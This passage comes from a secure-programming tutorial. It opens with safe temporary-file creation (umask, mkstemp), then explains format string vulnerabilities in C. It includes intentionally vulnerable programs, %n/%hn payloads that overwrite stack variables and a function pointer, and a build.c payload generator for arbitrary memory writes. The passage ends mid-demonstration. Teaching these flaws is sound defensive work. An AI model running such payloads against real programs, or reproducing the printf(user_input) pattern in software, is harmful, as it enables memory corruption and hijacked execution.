Temporary file permissions are quite important too. Writing confidential information into a mode 644 file (read/write for the owner, read only for the rest of the world) is a problem. The

    #include <sys/types.h>
    #include <sys/stat.h>

    mode_t umask(mode_t mask);

function lets us restrict the permissions of a file at creation time. Thus, following a umask(077) call, a file requested with mode 644 is created with mode 600 (read/write for the owner, no rights at all for the others).
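The effect of the mask can be checked with a short sketch. The helper name create_private() is hypothetical; it asks for mode 0644 on purpose, to show that the mask removes the group and world bits.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Create `path` asking for mode 0644 while umask(077) is in effect,
 * and return the permission bits the file actually received,
 * or (mode_t) -1 on error. The previous mask is restored.
 */
mode_t create_private(const char *path)
{
    struct stat st;
    mode_t old_mask = umask(077);
    int fd = open(path, O_RDWR | O_CREAT | O_EXCL, 0644);

    (void) umask(old_mask);
    if (fd == -1)
        return (mode_t) -1;
    if (fstat(fd, &st) == -1) {
        close(fd);
        return (mode_t) -1;
    }
    close(fd);
    return st.st_mode & 0777;   /* 0644 & ~077 gives 0600 */
}
```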

Usually, the temporary file creation is done in three steps :

  1. unique name creation (random) ;
  2. file opening using O_CREAT | O_EXCL, with the most restrictive permissions;
  3. checking the result when opening the file and reacting accordingly (either retry or quit).

How do we create a temporary file ? The

      #include <stdio.h>

      char *tmpnam(char *s);
      char *tempnam(const char *dir, const char *prefix);

functions return pointers to randomly created names.

The first function accepts a NULL argument, in which case it returns the address of a static buffer whose content will change at the next tmpnam(NULL) call. If the argument is an allocated string, the name is copied there, which requires a string of at least L_tmpnam bytes. Be careful with buffer overflows ! The man page warns about problems when the function is used with a NULL parameter if _POSIX_THREADS or _POSIX_THREAD_SAFE_FUNCTIONS are defined.

The tempnam() function returns a pointer to a string. The dir directory must be “suitable” (the man page describes the right meaning of “suitable”). This function checks the file doesn’t exist before returning its name. However, once again, the man page doesn’t recommend its use, since “suitable” can have a different meaning according to the function implementations. Let’s mention that Gnome recommends its use in this way :

  char *filename;
  int fd;

  do {
    filename = tempnam (NULL, "foo");
    fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
    free (filename);
  } while (fd == -1);

The loop used here reduces the risks but creates new ones. What would happen if the partition where you want to create the temporary file is full, or if the system has already opened the maximum number of files available at once ? open() would fail on every attempt and the loop would never end.
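One way around this problem is to retry only when the name is already taken and to give up after a fixed number of attempts. The sketch below is an illustration under several assumptions: the helper name open_temp_bounded(), the "foo" prefix and the bound of 16 attempts are arbitrary, and rand() is not a secure source of names. The safety comes from O_CREAT | O_EXCL, not from the unpredictability of the name.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAX_ATTEMPTS 16   /* arbitrary bound chosen for this sketch */

/*
 * Try to create a new file in `dir`, storing its name in `path`.
 * Retries only when the candidate name already exists.
 * Returns an open descriptor, or -1 with errno set.
 */
int open_temp_bounded(const char *dir, char *path, size_t path_len)
{
    int attempt;

    for (attempt = 0; attempt < MAX_ATTEMPTS; attempt++) {
        int fd;
        int n = snprintf(path, path_len, "%s/foo.%ld.%d",
                         dir, (long) getpid(), rand());

        if (n < 0 || (size_t) n >= path_len) {
            errno = ENAMETOOLONG;
            return -1;
        }
        fd = open(path, O_CREAT | O_EXCL | O_RDWR, 0600);
        if (fd != -1)
            return fd;
        if (errno != EEXIST)
            return -1;   /* full disk, too many open files...: give up */
    }
    errno = EEXIST;
    return -1;
}
```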


The

       #include <stdio.h>

       FILE *tmpfile (void);

function creates a unique filename and opens it. This file is automatically deleted at closing time.

With GlibC-2.1.3, this function uses a mechanism similar to tmpnam() to generate the filename, and opens the corresponding descriptor. The file is then deleted, but Linux really removes it only when nothing uses it any more, that is, when the file descriptor is released using a close() system call.

  FILE * fp_tmp;

  if ((fp_tmp = tmpfile()) == NULL) {
    fprintf (stderr, "Can't create a temporary file\n");
    exit (EXIT_FAILURE);
  }

  /* ... use of the temporary file ... */

  fclose (fp_tmp);  /* real deletion from the system */

The simplest cases don’t require filename change nor transmission to another process, but only storage and data re-reading in a temporary area. We therefore don’t need to know the name of the temporary file but only to access its content. The tmpfile() function does it.

The man page says nothing, but the Secure-Programs-HOWTO doesn’t recommend it. According to the author, the specifications don’t guarantee how the file is created and he hasn’t been able to check every implementation. Despite this reservation, this function is the most efficient.

Last, the

       #include <stdlib.h>

       char *mktemp(char *template);
       int mkstemp(char *template);

functions create a unique name from a template made of a string ending with “XXXXXX”. These ‘X’s are replaced to get a unique filename.

Depending on the version, mktemp() replaces the first five ‘X’ with the Process ID (PID) … which makes the name rather easy to guess : only the last ‘X’ is random. Some versions allow more than six ‘X’.

mkstemp() is the recommended function in the Secure-Programs-HOWTO. Here is the method :

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Prints an error message and aborts the program. */
void failure(const char *msg) {
  fprintf(stderr, "%s\n", msg);
  exit(1);
}

/*
 * Creates a temporary file and returns it.
 * This routine removes the filename from the filesystem thus
 * it doesn't appear anymore when listing the directory.
 */
FILE *create_tempfile(char *temp_filename_pattern)
{
  int temp_fd;
  mode_t old_mode;
  FILE *temp_file;

  /* Create file with restrictive permissions */
  old_mode = umask(077);
  temp_fd = mkstemp(temp_filename_pattern);
  (void) umask(old_mode);
  if (temp_fd == -1) {
    failure("Couldn't open temporary file");
  }
  if (!(temp_file = fdopen(temp_fd, "w+b"))) {
    failure("Couldn't create temporary file's file descriptor");
  }
  if (unlink(temp_filename_pattern) == -1) {
    failure("Couldn't unlink temporary file");
  }
  return temp_file;
}

These functions show the problems concerning abstraction and portability. That is, the standard library functions are expected to provide features (abstraction)… but the way to implement them varies according to the system (portability). For instance, the tmpfile() function opens a temporary file in different ways (some versions don’t use O_EXCL), or mkstemp() handles a variable number of ‘X’ according to implementations.


We have skimmed over most of the security problems concerning race conditions on a shared resource. Remember that you must never assume that two consecutive operations are executed back to back by the CPU unless the kernel guarantees it. While race conditions on files generate security holes, you must not neglect those involving other resources, such as variables shared between threads or memory segments shared using shmget(). Access control mechanisms (semaphores, for example) must be used to avoid hard-to-find bugs.


Avoiding security holes when developing an application – Part 4: format strings

Where is the danger ?

Most security flaws come from bad configuration or laziness. This rule holds true for format strings.

It is often necessary to use null terminated strings in a program. Where inside the program is not important here. This vulnerability is again about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough:

printf("%s", str);

However, a programmer can decide to save time and six bytes by writing only:

printf(str);

With “economy” in mind, this programmer opens a potential hole in his work. He is satisfied with passing a single string as an argument, which he simply wanted to display without any change. However, this string will be parsed to look for formatting directives (%d, %g…). When such a format character is discovered, the corresponding argument is looked for in the stack.
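The safe form can be wrapped in a small helper, sketched here with snprintf(). The name copy_untrusted() is hypothetical. Because the untrusted text is passed as data for a constant "%s" format, any directive it contains is copied literally instead of being interpreted.

```c
#include <stdio.h>

/*
 * Copy an untrusted string into `out` without ever using it as a
 * format. Returns the value of snprintf(), i.e. the length of the
 * untrusted string.
 */
int copy_untrusted(char *out, size_t out_len, const char *untrusted)
{
    /* Never write: snprintf(out, out_len, untrusted); */
    return snprintf(out, out_len, "%s", untrusted);
}
```

With the input "%x %x %n", the output buffer receives exactly those eight characters and nothing is read from or written to the stack.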

We will start introducing the family of printf() functions. At least, we expect everyone knows them … but not in detail, so we will deal with the lesser known aspects of these routines. Then, we will see how to get the necessary information to exploit such a mistake. Finally, we will show how all this fits together with a single example.

Deep inside format strings

In this part, we will consider the format strings. We will start with a summary about their use and we will discover a rather little known format instruction that will reveal all its mystery.

printf() : they told me a lie !

Note for non-French residents: we have in our nice country a racing cyclist who pretended for months not to have taken dope while all the other members of his team admitted it. He claims that if he has been doped, he didn’t know it. So, a famous puppet show used the French sentence “on m’aurait menti !” which gave me the idea for this title.

Let us start with what we all learned in our programming handbooks: most of the C input/output functions use data formatting, which means that one has to provide not only the data for reading/writing, but also how it should be displayed. The following program illustrates this:

/* display.c */
#include <stdio.h>

int main(void) {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);   /* both values shown as integers */
  printf("char : %c %c\n", i, a);   /* both values shown as characters */
  return 0;
}

Running it displays:

>>gcc display.c -o display
>>./display
int  : 64 97
char : @ a

The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), which makes a display its ASCII value. On the other hand, the second printf() converts the integer variable i to the character whose ASCII code is 64, that is @.

Nothing new – everything conforms to the many functions with a prototype similar to the printf() function :

  1. one argument, in the form of a character string (const char *format) is used to specify the selected format;
  2. one or more other optional arguments, containing the variables in which values are formatted according to the indications given in the previous string.

Most of our programming lessons stop there, providing a non-exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to force the precision…). But there is another one that is never talked about: %n. Here is what the printf() man page says about it:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Here is the most important thing of this article: this argument makes it possible to write into the variable a pointer refers to, even when used in a display function !

Before continuing, let us say that this format also exists for functions from the scanf() and syslog() family.

Time to play

We are going to study the use and the behavior of this format through small programs. The first, printf1, shows a very simple use:

/* printf1.c */
1: #include <stdio.h>
3: main() {
4:   char *buf = "0123456789";
5:   int n;
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }

The first printf() call displays the string “0123456789” which contains 10 characters. The next %n format writes this value to the variable n:

>>gcc printf1.c -o printf1
>>./printf1
0123456789
n = 10

Let’s slightly transform our program by replacing the instruction printf() line 7 with the following one:

7:   printf("buf=%s%n\n", buf, &n);

Running this new program confirms our idea: the variable n is now 14, (10 characters from the buf string variable added to the 4 characters from the “buf=” constant string, contained in the format string itself).

So, we know the %n format counts every character written so far, including those coming from the format string itself. Moreover, as the printf2 program demonstrates, it counts even further:

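/* printf2.c */

#include <stdio.h>
#include <string.h>

int main(void) {
  char buf[10];
  int n, x = 0;

  /* the output is truncated to sizeof buf, but %n is not */
  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", (int) strlen(buf));
  printf("n = %d\n", n);
  return 0;
}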

The snprintf() function is used here to prevent buffer overflows. The variable n should then be 10:

>>gcc printf2.c -o printf2
>>./printf2
l = 9
n = 100

Strange ? In fact, the %n format counts the number of characters that should have been written. This example shows that the truncation imposed by the size argument is ignored.
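The same would-be length is also what snprintf() returns since C99, which gives a second way to observe the truncation. The sketch below gathers the three numbers in a structure; the names truncation_report and measure_truncation() are hypothetical, and the value stored by %n is the one observed with glibc in the run above.

```c
#include <stdio.h>
#include <string.h>

struct truncation_report {
    int returned;    /* value returned by snprintf() */
    int counted;     /* value stored by %n */
    size_t stored;   /* strlen() of the destination buffer */
};

/* Repeats the printf2 experiment and reports what happened. */
struct truncation_report measure_truncation(void)
{
    char buf[10];
    struct truncation_report r;
    int x = 0;

    r.counted = -1;
    r.returned = snprintf(buf, sizeof buf, "%.100d%n", x, &r.counted);
    r.stored = strlen(buf);
    return r;
}
```

Comparing the return value with the buffer size is the usual way to detect that the output was cut.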

What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:

/* printf3.c */

#include <stdio.h>
#include <string.h>

int main(void) {
  char buf[5];
  int n, x = 1234;

  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", (int) strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, (int) sizeof buf);
  return 0;
}

printf3 contains some differences compared to printf2:

  • the buffer size is reduced to 5 bytes
  • the precision in the format string is now set to 5;
  • the buffer content is finally displayed.

We get the following display:

>>gcc printf3.c -o printf3
>>./printf3
l = 4
n = 5
buf = [0123] (5)

The first two lines are not surprising. The last one illustrates the behavior of the snprintf() function :

  1. the format string is expanded according to the commands it contains, which provides the string “00000”;
  2. the variables are written where and how they should be, which is illustrated by the copying of x in our example. The string then looks like “01234”;
  3. last, sizeof buf - 1 bytes from this string (one byte is kept for the terminating '\0') are copied into the buf destination string, which gives us “0123”.

This is not perfectly exact but reflects the general process. For more details, the reader should refer to the GlibC sources, and particularly vfprintf() in the ${GLIBC_HOME}/stdio-common directory.

Before ending this part, let’s add that it is possible to get the same results by writing the format string in a slightly different way. We previously used the precision (the dot ‘.’). Another combination of formatting instructions leads to an identical result: 0n, where n is the field width and 0 means that padding spaces are replaced with 0 when the value does not fill the whole width.
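The two notations can be compared side by side with the short sketch below (the helper names are hypothetical). For a positive value such as 1234 they give the same string. They differ for negative values, because the precision counts digits only, whereas the width also counts the sign.

```c
#include <stdio.h>

/* Precision: at least 5 digits, the sign is not counted. */
int format_with_precision(char *out, size_t n, int value)
{
    return snprintf(out, n, "%.5d", value);
}

/* Zero flag and width: at least 5 characters, sign included. */
int format_with_zero_width(char *out, size_t n, int value)
{
    return snprintf(out, n, "%05d", value);
}
```

With 1234 both helpers produce 01234. With -42 the first one produces -00042 and the second one -0042.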

Now that you know almost everything about format strings, and most specifically about the %n format, we will study their behaviors.

The stack and printf()

Walking through the stack

The next program will guide us all along this section to understand how printf() and the stack are related:

/* stack.c */
 1: #include <stdio.h>
 3: int
 4:  main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }

This program just copies an argument into the buffer character array. We take care not to overflow any important data (format strings are really more accurate than buffer overflows ;-)

>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)

It works as we expected :) Before going further, let’s examine what happens from the stack point of view while calling snprintf() at line 10.

Fig. 1 : the stack at the beginning of snprintf()

Figure 1 describes the state of the stack when the program enters the snprintf() function (we’ll see that it is not quite true … but this is just to give you an idea of what’s happening). We don’t care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values, located at %ebp and %ebp+4, contain the respective backups of the %ebp and %eip registers. Next come the arguments of the function snprintf():

  1. the destination address;
  2. the number of characters to be copied;
  3. the address of the format string argv[1] which also acts as data.

Lastly, the stack is topped off with the tmp array of 4 characters, the 64 bytes of the buffer variable and the i integer variable.

The argv[1] string is used at the same time as format string and data. According to the normal order of the snprintf() routine, argv[1] appears instead of the format string. Since you can use a format string without format directives (just text), everything is fine :)

What happens when argv[1] also contains formatting directives ? Normally, snprintf() interprets them as they are … and there is no reason why it should act differently ! But here, you may wonder what arguments are going to be used as data for formatting the resulting output string. In fact, snprintf() grabs data from the stack ! You can see that from our stack program:

>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)

First, the “123 ” string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number according to our little endian x86 processor.
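The byte order can be checked with a small sketch that rebuilds the 32-bit word by hand, the way a little endian processor reads it. The helper names read_le32() and format_le32_hex() are hypothetical. Shifts are used instead of a pointer cast so that the result does not depend on the machine running the example.

```c
#include <stdint.h>
#include <stdio.h>

/* Assemble 4 bytes into a word, lowest address = lowest-order byte. */
uint32_t read_le32(const unsigned char bytes[4])
{
    return (uint32_t) bytes[0]
         | ((uint32_t) bytes[1] << 8)
         | ((uint32_t) bytes[2] << 16)
         | ((uint32_t) bytes[3] << 24);
}

/* Format the word the way a %x directive would display it. */
int format_le32_hex(char *out, size_t n, const unsigned char bytes[4])
{
    return snprintf(out, n, "%x", (unsigned int) read_le32(bytes));
}
```

The bytes 01 02 03 00 of tmp come out as 30201, and the four characters “123 ” come out as 20333231.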

>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)

Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the first 4 bytes of buffer. However, buffer contains the “123 ” string, which can be seen as the 0x20333231 hexadecimal number (0x20=space, 0x31=’1’…). So, for each %x, snprintf() “jumps” 4 bytes further in buffer (4 because an unsigned int takes 4 bytes on x86 processors). This variable acts as a double agent by:

  1. receiving the output as the destination;
  2. providing input data for the format.

We can “climb up” the stack as long as our buffer contains bytes:

>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378
         0x333837] (63)
i = 1 (bffff654)

Even higher

The previous method allows us to look for important information such as the return address of the function that created the stack frame holding the buffer. However, it is possible, with the right format, to look for data further than the vulnerable buffer.

You can find an occasionally useful format when it is necessary to swap between the parameters (for instance, while displaying date and time). We add the m$ format, right after the %, where m is an integer >0. It gives the position of the variable to use in the arguments list (starting from 1):
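Here is the legitimate use of this notation, as a minimal sketch (the helper name format_swapped() is hypothetical). The m$ form is a POSIX extension and is not part of ISO C, so it is assumed here that the C library supports it, as glibc does.

```c
#include <stdio.h>

/*
 * Writes `second`, a space, then `first` into `out`:
 * %2$s consumes the second variadic argument, %1$s the first one.
 */
int format_swapped(char *out, size_t n,
                   const char *first, const char *second)
{
    return snprintf(out, n, "%2$s %1$s", first, second);
}
```

Calling format_swapped(out, sizeof out, "world", "hello") stores “hello world” in out.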

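/* explore.c */
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {

  char buf[12];

  memset(buf, 0, 12);
  /* deliberately vulnerable: argv[1] is used as the format string */
  snprintf(buf, 12, argv[1]);

  printf("[%s] (%d)\n", buf, (int) strlen(buf));
  return 0;
}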

The format using m$ enables us to go up where we want in the stack, as we could do using gdb:

>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)

The character \ is necessary here to protect the $ and to prevent the shell from interpreting it. In the first three calls we visit the contents of the buf variable. With %4\$x, we get the saved %ebp register, and then with the next %5\$x, the saved %eip register (a.k.a. the return address). The last 2 results presented here show the argc variable value and the address contained in *argv (remember that **argv means that *argv is an array of addresses).

In short …

This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return address of a function, another address… However, we saw at the beginning of this article that we could write using functions of the printf() type: doesn’t this look like a wonderful potential vulnerability ?

First steps

Let’s go back to the stack program:

>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)

We give as input string:

  1. the i variable address;
  2. a formatting instruction (%.496x);
  3. a second formatting instruction (%n) which will write into the given address.

To determine the address of the i variable (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can see, i has a new value :) Given the format string and the stack layout, the snprintf() call looks like :

snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);

The first four bytes (containing the address of i) are written at the beginning of buffer. The %.496x format allows us to get rid of the tmp variable, which is at the beginning of the stack. Then, when the %n formatting instruction is processed, the address used is that of i, found at the beginning of buffer. Although the required precision is 496, snprintf() writes at most sixty bytes (because the length of the buffer is 64 and 4 bytes have already been written). The value 496 is arbitrary and is just used to manipulate the “byte counter”. We have seen that the %n format saves the number of bytes that should have been written. This value is 496, to which we add the 4 bytes of the address of i at the beginning of buffer. Therefore, we have counted 500 bytes. This value is written to the next address found in the stack, which is the address of i.

We can go even further with this example. To change i, we needed to know its address … but sometimes the program itself provides it:

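/* swap.c */
#include <stdio.h>

int main(int argc, char **argv) {

  int cpt1 = 0;
  int cpt2 = 0;
  /* on 32-bit x86 an int is wide enough to hold an address */
  int addr_cpt1 = &cpt1;
  int addr_cpt2 = &cpt2;

  /* deliberately vulnerable: argv[1] is used as the format string */
  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
  return 0;
}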

Running this program shows that we can control the stack (almost) as we want:

>>./swap AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
cpt1 = 4
cpt2 = 0

As you can see, depending on the argument, we can change either cpt1 or cpt2. The %n format expects an address, which is why we can’t act directly on the variables (i.e. using %3$n (cpt2) or %4$n (cpt1)) but have to go through pointers. The latter are “fresh meat” with enormous possibilities for modification.

Variations on the same topic

The examples previously presented come from a program compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won’t get the same results on your own box. Indeed, the functions of the *printf() type change with the glibc version, and different compilers do not perform the same operations.

The program stuff highlights these differences:

/* stuff.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {

  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";

  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }

  memset(buffer, 0, sizeof buffer);
  /* deliberately vulnerable: argv[1] is used as the format string */
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, (int) strlen(buffer));
  return 0;
}

The aaa and bbb arrays are used as delimiters in our journey through the stack. Therefore we know that when we find 424242, the following bytes will be in buffer. Table 1 presents the differences according to the versions of the glibc and compilers.

Tab. 1 : Variations around glibc

Compiler      glibc      Display
gcc-2.95.3    2.1.3-16   buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63)
egcs-2.91.66  2.1.3-22   buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63)
gcc-2.96      2.1.92-14  buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)
gcc-2.96      2.2-12     buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)

Next in this article, we will continue to use egcs-2.91.66 and the glibc-2.1.3-22 , but don’t be surprised if you note differences on your machine.

Exploitation of a format bug

While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.

With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, …): we just have to say where and what to write, and %n does the job for us.

The vulnerable program

You can exploit a format bug in different ways. P. Bouchareine’s article (Format string vulnerability) shows how to overwrite the return address of a function, so we’ll show something else.

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();

  memset(buffer, 0, sizeof(buffer));

  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);

  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

  /* deliberately vulnerable: the caller controls the format string */
  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, (int) strlen(buffer));

  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

  return ptrf();
}

int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for (i = 0; i < argc; i++)
    printf("%d %p\n",i,argv[i]);

  exit(vuln(argv[1]));
}

int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  return 0;
}

int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  return 0;
}

We define a variable named ptrf which is a pointer to a function. We will change the value of this pointer to run the function we choose.

First example

First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:

>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"

>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"

The first call here gives us what we need: 3 words (one word = 4 bytes for x86 processors) separate us from the beginning of the buffer variable. The second call, with AAAA%3\$x as argument, confirms this.

Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, roughly 128 MB). Not every computer can afford such a use of memory … but the one we are using can :) It takes around 20 seconds on a dual Pentium 350 MHz:

>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"

What did we do? We first provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack with a precision of 134514256 (the 4 bytes of the ptrf address are already written, so 134514260-4=134514256 bytes remain). Finally, %3$n writes the resulting count to the given address.

Memory problems: divide and conquer

However, as we mentioned, it isn’t always possible to use 128 MB buffers. The %n format expects a pointer to an integer, i.e. four bytes. Its behavior can be altered to make it point to a short int, only 2 bytes, with the %hn format. We thus cut the integer we want to write into two parts. The largest value to write then fits in 0xffff bytes (65535 bytes). In the previous example, we transform the operation “writing 0x8048654 at address 0xbffff5d4” into two successive operations:

  • writing 0x8654 in the 0xbffff5d4 address
  • writing 0x0804 in the 0xbffff5d4+2=0xbffff5d6 address

The second write operation takes place on the high bytes of the integer, which explains the 2-byte shift in the address.

However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. First, we have to write the smallest value between the two. Then, the second formatting will only use the difference between the needed number and the first number written as precision. For instance in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 – 0x0804). Each %hn placed right after will record the right amount of bytes.

We just have to specify where to write to both %hn. The m$ operator will greatly help us. If we save the addresses at the beginning of the vulnerable buffer, we just have to go up through the stack to find the offset from the beginning of the buffer using the m$ format. Then, both addresses will be at an offset of m and m+1. As we use the first 8 bytes in the buffer to save the addresses to overwrite, the first written value must be decreased by 8.

Our format string looks like:

"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max - val. min.]x%[offset+1]$hn"

The build program uses three arguments to create a format string:

  1. the address to overwrite;
  2. the value to write there;
  3. the offset (counted as words) from the beginning of the vulnerable buffer.
/* build.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/*
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value,
      unsigned int where) {

  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128;
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;

  char *buf;

  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom

  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);

  /* let's build (%u is used because the paddings are unsigned) */
  if (valh < vall) {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%ux"             /* set the value for the first %hn */
         "%%%u$hn"            /* the %hn for the high part */

         "%%.%ux"             /* set the value for the second %hn */
         "%%%u$hn"            /* the %hn for the low part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         valh-8,              /* set the value for the first %hn */
         where,               /* the %hn for the high part */

         vall-valh,           /* set the value for the second %hn */
         where+1              /* the %hn for the low part */
         );

  } else {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%ux"             /* set the value for the first %hn */
         "%%%u$hn"            /* the %hn for the low part */

         "%%.%ux"             /* set the value for the second %hn */
         "%%%u$hn"            /* the %hn for the high part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         vall-8,              /* set the value for the first %hn */
         where+1,             /* the %hn for the low part */

         valh-vall,           /* set the value for the second %hn */
         where                /* the %hn for the high part */
         );
  }
  return buf;
}

int main(int argc, char **argv) {

  char *buf;

  if (argc < 4)   /* address, value and offset are all required */
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* address */
          strtoul(argv[2], NULL, 16),  /* value */
          atoi(argv[3]));              /* offset */

  fprintf(stderr, "[%s] (%d)\n", buf, (int)strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}

The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let’s check what we get now, without any memory troubles.

First, our simple example lets us find the offset:

>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"

It is always the same: 3. Since our program is written to show what happens, we already have all the other information we need: the addresses of ptrf and accesForbidden(). We build our buffer according to these:

>>./vuln `./build 0xbffff5d4 0x8048664 3`
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
